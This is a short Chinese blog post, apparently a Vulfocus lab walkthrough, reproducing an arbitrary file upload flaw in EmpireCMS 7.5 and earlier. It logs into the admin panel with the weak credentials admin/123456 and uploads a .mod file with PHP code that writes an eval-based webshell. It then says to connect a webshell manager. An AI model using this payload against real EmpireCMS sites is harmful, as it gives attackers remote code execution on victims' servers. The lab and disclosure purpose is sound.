漏洞描述
EmpireCMS(帝国网站管理系统)是一套内容管理系统(CMS)。 EmpireCMS 7.5版本中的e/class/moddofun.php文件的‘LoadInMod’函数存在安全漏洞。攻击者可利用该漏洞上传任意文件。
影响范围
EmpireCMS<=7.5
漏洞复现
进入后台
http://123.58.224.8:14326/empirecms/e/admin/
弱口令admin/123456登陆成功
依次点击
上传一句话木马,后缀名为.mod
<?php file_put_contents("shell.php","<?php @eval(\$_POST[cmd]); ?>");?>
接着访问
http://123.58.224.8:14326/empirecms/e/admin/shell.php
看看有没有成功解析
webshell管理工具连接
标签:文件,empirecms,Vulfocus,admin,EmpireCMS,漏洞,18086,上传 From: https://www.cnblogs.com/mlxwl/p/16585188.html